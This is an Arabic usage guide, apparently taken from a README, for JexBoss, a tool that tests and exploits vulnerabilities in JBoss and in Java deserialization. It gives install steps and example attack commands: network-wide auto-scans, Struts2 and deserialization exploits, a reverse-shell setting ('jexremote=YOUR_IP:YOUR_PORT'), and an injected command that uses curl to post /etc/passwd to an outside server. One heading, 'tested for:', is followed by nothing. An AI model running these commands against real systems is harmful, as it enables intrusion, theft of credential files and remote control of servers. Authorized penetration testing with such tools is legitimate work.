
JexBoss: أداة التحقق من واستغلال Jboss (وثغرات إلغاء التسلسل في Java)
JexBoss هي أداة لاختبار واستغلال الثغرات الأمنية في خادم تطبيقات JBoss ومنصات Java، وأطر العمل، والتطبيقات الأخرى.
لتثبيت أحدث إصدار من JexBoss، يرجى استخدام الأوامر التالية:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
أو:
قم بتنزيل أحدث إصدار من: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
إذا كنت تستخدم CentOS مع Python 2.6، يرجى تثبيت Python2.7. مثال على تثبيت Python 2.7 على CentOS باستخدام Collections Software scl:
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash
إذا كنت تستخدم Windows، يمكنك استخدام Git Bash لتشغيل JexBoss. اتبع الخطوات التالية:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
تم تطوير واختبار الأداة والاستغلالات من أجل:
نواقل الاستغلال هي:
$ python jexboss.py

$ python jexboss.py -u http://192.168.0.26:8080

$ python jexboss.py -h
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt


بعد استغلال خادم JBoss، يمكنك استخدام واجهة الأوامر الخاصة بـ jexboss نفسها أو إجراء اتصال عكسي باستخدام الأمر التالي:
jexremote=YOUR_IP:YOUR_PORT
مثال:
Shell>jexremote=192.168.0.10:4444

عند استغلال ثغرات إلغاء تسلسل Java (Application Deserialization، Servlet Deserialization)، تكون الخيارات الافتراضية: إجراء اتصال عكسي (reverse shell) أو إرسال أمر لتنفيذه.
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log